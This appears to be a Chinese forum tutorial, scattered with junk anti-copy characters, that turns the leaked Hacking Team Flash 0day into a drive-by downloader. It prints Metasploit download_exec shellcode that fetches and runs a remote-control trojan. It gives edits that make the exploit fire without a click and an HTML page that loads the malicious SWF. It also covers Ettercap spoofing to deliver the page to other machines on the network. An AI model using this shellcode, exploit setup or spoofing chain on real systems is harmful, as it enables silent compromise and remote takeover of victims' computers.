|
$ _# ?1 m0 X: w/ f4 s* H0 E. B
三、flash 0day之手工代码修改制作下载者实例入侵演示 0 J d5 d/ z2 d. b2 X2 J
& r, O9 |$ ?6 N" v4 ?. C; |3 ^0 c7 a0 I: l8 L W8 ~
利用到的工具:
: |) o2 Y* n O# j8 D1 c: U
$ K1 H4 }4 F0 f& k1 s
; a: i( h' @) x1 A- S* P! R Msf
" T7 s! J! F' l/ Q3 }/ v' p( M( g
! c$ A( ~9 x3 _! L$ [1 f' I3 n, h4 Q
Ettercap
+ t1 A2 V4 r2 S7 q 8 t6 \ G. q! i6 e: S
! z1 F6 d# L" i7 a) m0 K! E0 B
Adobe Flash CS6
5 t3 s+ a% h4 v) q, n
( W5 w. B/ I m. U# a
" R- W$ C$ Y; K! e Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 3 t% E: u X, z6 q# l
9 L# T" ?/ c j' h6 H; \
8 w* ]/ w; B2 f7 E# x 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
) u9 W( ^. O5 ]+ v+ s* U & m L8 y, b5 |! u; E7 s
6 w. V& a( m0 ?
如图: ; H( f. c8 G. d# ~2 `; R
1 v9 _% }% e! L% ~' p
1 B- u! u4 C) f4 |
/ u$ o$ q- l5 h* w
4 R& M9 p: G* Q# u
2 y8 p# X$ b. _ 3 ]& L/ ~4 \8 ~1 t9 L' D
% w* p0 W$ u* a
) J2 ?: P' d/ z, [ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: + V! `- W; n2 ^; P: g. c- u) m
+ C8 A: F# {: i' t! v) w: V. I
% Z+ k/ P& W2 N1 w. R ; `% }5 z) p( R7 i. S* ^6 `2 p
# ]3 m, @" X7 |4 l
; V5 z5 {$ |$ L 0 M2 Y: z8 r7 C7 B" x
' R: r Z: c! _6 R+ }# h4 O Q) [ n
然后执行generate -t dword生成shellcode,如下:
! ?2 O$ P. O: x
1 i8 F( j3 a& A8 v& i7 ?+ I( _( l6 f5 T4 a8 W0 r Z
5 z1 k& Q5 V/ g/ X
9 ^) X K% b" x/ r
8 O6 c$ G/ L$ C! o# ` 复制代码到文本下便于我们一会编辑flash exp,如下: / G2 C& C9 Y( @5 w& T: P+ g
6 g3 ?% y; `- y* x6 f7 S$ ~ I' G. U2 d" b: i$ ~; i
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, + D9 T" ^3 z! R$ m1 N+ Y# c& R7 h
( h) m1 G2 H& P) ~. ?1 ^& r
4 p8 d6 d/ x1 r: E( x3 W 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
o2 ]" y) [1 [+ P1 N. v0 w' Y) c , Y& O. f. R8 t9 Y
' W. J6 R G5 G+ S& v: k; c 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
; K& y) g8 q, W4 L A0 S q* J) E& [; j& R( c
) A- x$ l2 X+ x' B 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
H+ g2 ^* \ U, G! E8 j ) p9 M5 [3 _& `* ?3 q
+ l# e A9 G1 X 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
5 R D- w% o J2 v" S
, T c$ T- E# ^2 z/ u* q& `( N6 `/ a
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 8 P, }" H8 |& _8 L
3 p8 s' E+ E3 ^& ]9 @0 B7 W+ n
& R ^0 L4 G5 A0 F 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
0 _: Y1 H8 t: h$ D6 @& {
, I1 U o: \4 K, n: l0 r! {5 l( U. u" {) Z
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, : y3 _1 c5 \2 o* u. _
! K; s; ?7 H, p) u
- p8 M o3 u0 W" T" a O 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 6 w6 c: B/ r2 L+ N+ J
9 i& ^) W% i9 R# Q! C# t8 q- C: L* _2 Z; L' m. p( Y
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 8 j9 V# T' c/ u. g& P* ~, u
8 U+ U9 Y! n5 ?
+ `8 H! m& W5 m p
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
0 w7 S. Y/ P6 F9 q, V8 [ 5 s+ P& {8 m" ?9 A# H- _$ p
) Y0 ` _" N' S( b3 [1 l
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
9 {7 c% {- [" g
+ i1 z4 C: j7 r0 M% t& l& W6 ~% W/ l& Q1 q5 H+ V
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
. Y. x& N8 ]6 d. n: S3 S
7 \: {5 Q, d" j# ^ @+ T; r6 \# o0 Z8 A
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 q5 L+ ?: k, H; l* @
3 g. Y7 ^" R$ q$ `+ E
0 ?$ m% i4 R3 I' [7 P
5 V% I1 u+ u: \2 d1 a0 q: M
7 M" r; H$ w( u" d/ C( B
$ D) } w9 e2 \7 ` / @0 u( i* w, f$ o8 s! H6 E! ~9 `
+ X$ [1 }: f* b/ u, p- Z L8 E ^" ^1 X
下面我们来修改flash 0day exp,需要修改三个文件,分别为: " X W7 N1 h1 M& u( v
8 P; A x& {* N% t! A" J: A# { @/ _6 O- c( S6 @% K
2 X( q5 A$ I! P9 Q" R6 I
3 `) j% B5 F2 j. j4 `
- U5 X7 i$ V( H
先修改ShellWin32.as,部分源代码如图:
" J9 U+ j. b) E
% z1 B6 ^; S; D# @/ ~
% @, w `' B$ S/ V' y2 D4 W, } 4 _! f& g- V' x
, c! C4 [2 f5 F0 i
" ?& f" g* Z6 b# P
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: / P. W/ y% A7 U7 Z5 [$ z. [
- \/ m1 B8 ^ C; K7 `0 k
) ?1 y' ^9 n/ L
6 ]7 @& [/ v4 s1 v" H
5 ]2 ?* B- n- \5 ^2 `
. l1 }6 r- K' w' R3 H6 J( C O r4 c! k 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
6 V8 i+ C- u3 }0 w
% S/ ]5 s0 O( j7 o) T' ]: ~! E( w- x5 E
; m5 {. D6 \: R& F' l$ q
]) L+ p4 |1 t+ S* `1 C8 S0 p1 S5 ~+ O% t4 u& t6 o/ `$ `
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
+ Y) Q. e% N5 L5 n( ^5 V2 i; V
% f8 Q0 a# n: F+ `; C9 G
1 C V8 M7 _ Q- Q" b - F1 h* s* x: s. e
' t- n+ ~" G. N
% X& b( u* e- l
# W# C! S3 z! F 5 J! C' S& ^) B3 E# r( E c
' {, ~! m& T: f4 |9 Z& B- ^ " ?6 v* n9 C; g8 o( N( V. t8 w
! L" Q. y& j% h4 b8 L! c
+ q3 k' E, Q7 n* R7 R# ^4 @1 i 然后点保存,下面我们来编译一下,打开 * O: J3 D! g( }
+ R* }. L6 J. Q ^
, k* o/ A) ^& [0 |) `( P exp1.fla然后点文件-发布,看看编译没错误
8 P6 D6 ~/ ]5 w; B% U; z
8 x* y; X9 {4 p) U' k, X; p2 |" a
+ ^. k/ i, m0 D0 |/ u* H& C
$ t, S; i/ i$ e$ w. ~0 t8 H 3 P4 f [ p) P |
) W* T6 b+ w7 c+ x 5 ~9 p% x; P3 b, p' @
0 S8 n) C; Q8 f
3 A+ x* ~$ A0 H% c
# G: F; S/ {: n& @ I
+ |. i$ t1 g) ^, l5 i9 t M2 D) g% r. I) U$ O9 g) {% _8 V8 p
) P8 j' o; G# R ( u( _/ s/ L: Y$ c! V
: V7 {# C+ K7 j! H 然后我们把生成的 : U* e, u8 Z M) ]& [
2 g% \' I& N* e u
! ?. U; ~$ |& l6 }
exp1.swf丢到kailinux 的/var/www/html下: ; Z: E" A4 {# V
0 u: {" t: W- P
. x! _+ ^3 w7 o y& y9 f( }7 N& F 然后把这段代码好好编辑一下
* p: c/ ]* O' \ 6 H. H" { P# h2 G; r( e
7 g8 g3 {/ ]) h+ G3 ], t+ X
; s B9 f+ f* m# J
1 B. h0 z7 m8 z5 U* L7 @6 R* B* |- f4 N8 X$ u' x) _6 T
6 g! g4 e* M, S& C. g& T
7 Y; d% Q" U$ o
/ w, }* s6 @( k0 `
6 ], Q/ D- Z; E. g
( K- Q a! M( ?& c0 T
$ |1 u, v4 {. |( s% a# E1 r* w 3 a4 F$ {/ Z3 V1 A& ?& D# \
q2 i; w0 g' D
9 |4 M g7 M0 X7 Z) a/ c0 m
0 |# T9 C8 y n; `2 d# Y # k! R' A, ?( O$ S* _ x4 c/ [
! J( ] w" }* y# w: W& Q
9 T" j8 z1 p: r$ f# ?; I
" W9 Z' [+ O$ q
$ g% d3 Z7 T( I/ a" m* U2 A& ] <!DOCTYPE html> 6 n. }/ b; _& o
4 L8 ~- T2 L+ O& ^' q& i
1 N# e+ `/ ]# `
<html> . Y; Y' f% E, F* a4 p
# o: R$ U7 a7 B2 U- H
4 v9 ~" j& Y# N7 Z4 u <head>
' w B' U; @1 s, i
% {, I3 ?! `* s' i7 {/ B: C; ]2 i+ i' M! K9 O
<meta http-equiv="Content-Type" content="text/html;
: c# C; m( ], d 9 c' T9 C9 j% P
$ ]9 x$ ~- V) z+ y charset=utf-8"/>
1 X1 u$ d4 B& p2 I0 D2 g
h* @7 F% T4 J) o0 x2 ?2 `8 ^2 o2 F. ^6 D, z) r( `
</head> 8 e% n5 {/ N+ [# D) `' r
* r( c+ |" Z% B ^/ o
! [ V2 {! ^: r( c" S
<body>
+ k) f" c. h2 ?" X. [ 2 c+ _9 u8 b/ A9 J4 e
- e; r0 L) c6 z$ q. C G& @: d9 | <h2> Please wait, the requested page is loading...</h2> / T# k% K+ G8 A. V: P
; Q' C5 P" k! m7 E" |
& a: j' p: Z* r% \/ r1 n# _
<br>
) [2 F/ z J+ ^4 u4 s + I3 i9 u4 b! y# b; G9 A
5 E7 B" |" W' \% X <OBJECT % w" F+ a6 ?8 E5 F
* S: _! l; i; g, Y2 x
7 k6 i6 {2 m+ j
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie / ^8 [0 M' Z( W9 Q1 U
; o; r3 M% j; t% x* h: _
6 _3 R7 H: i. U" z' q VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
4 O+ s* L# K ?
9 C7 J5 }( m1 v3 I2 B1 q @ _$ ^6 N7 j$ w
</body> . L$ K% ^, o" {( B0 X9 V. X
8 @$ E- _ h" g7 }: p% Y- S
" _* s# S- C* a& V. [9 D7 o
<script>
! m7 m$ x) j# c' l- U/ g# z$ \ # H1 E" r c6 _
* V! t9 R3 r; r) ~' ?
setTimeout(function () {
9 t5 C o& x3 i- x/ i8 B7 D , g# V' Z: b; D3 q
' I/ g* Q/ a+ a1 J7 v $ r1 Z# F# ]* q$ n- k* r; c) g
" v( `* [* [, L" f8 m+ [9 \$ Z. f
" c: e' @9 G m0 \+ h window.location.reload(); 2 v1 R/ { H2 D7 ?# K
, g4 n6 r$ r3 q$ b. }9 Z$ o1 E0 r! h
% f8 ~/ N3 ~6 q$ }8 v7 P }, 10000); l: H) R3 @! s. R4 S M0 y
# H6 t) D1 w- k. [6 a7 @! N N9 |2 n9 C9 m9 |8 X+ K, b
8 S- V# I! j" f- s
1 S4 d" o; y7 h0 `/ f! T; u: I5 ~7 P$ `
</script> 3 [6 K$ y. {/ s
* T4 x/ _0 [, d" G
6 @. H" H8 ~" s! v# L* Q </html> % d$ C& s( x) i: z* j
' x: V7 S0 _1 u7 d) X
. l% z# H. @% i3 _- p A
& ^( Y7 v7 y4 X: T" p. L 6 M3 Q# b/ }- p" \, c
5 m2 |5 _6 b% j, x- l) I3 ?+ F 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
# y: ]0 Q0 o# E9 F2 v
4 U4 m6 C- v- Q; a/ {; V' R5 d, @% X2 i5 e0 X3 U' V
7 n! Y4 p P; e/ {. r7 U; ~
# i& v2 F$ E3 C$ Q& p% D4 X' k- H1 v* G" c" {
6 C6 H3 R, A4 G
7 h3 _. Y( y6 f* d3 @5 a8 ?' V/ Q2 O* s
, L$ ^. N, n" n5 v) V
) h! w( a3 g: K( W
/ k' F; I9 }8 V- [
. ]3 [8 X% r8 S- {% y0 f # z5 c. [9 l' g9 |9 N4 R. _9 u3 O- m
' |& T, q) }/ ?% f3 U ~
1 t! u% O/ A; K" S5 o 9 W; l* }+ N4 O; k
* A& f/ f w' U 下面我们用ettercap欺骗如图: 2 y0 ~. _: _; t2 S3 [( P
2 W, I. o {/ N: e2 @% n7 N a+ a
4 e7 {8 P1 t& |- H; a/ V2 Y
' B a; T* T* H+ W1 d2 Y$ l) B. V. K
$ S: k, E( L8 n% M* O! }1 Z: X+ l% s5 S$ w! N6 D9 O9 G3 @+ E2 m, ?
! P! R0 n! [# j# I4 l
' ?" L; W$ p* {$ |9 U
, u: L1 Z$ @, A* U* e- [5 @ 下面我们随便访问个网站看看:
; n0 V5 I; F% t 3 T! S& H/ n- W: M) Y- l7 J' k
% a+ O) ]1 t8 ~8 b' M
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: / ]% _- S; r0 `, y# X
( ?# L2 Y% H8 \5 W
7 m' w& j, K+ y, l7 y% Z, @) t2 D , A; R5 M7 `- I6 `$ L
2 \/ }/ [% w7 X. E0 C
0 M7 ], c' b& _ 我们看另一台, ; q i/ [! y' P, S: P
; A' k! e. N! Z0 z5 b$ o7 q5 n+ [: \% b( d+ ^/ c8 x
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
, O) ^/ k% e) a( u8 O9 G( y |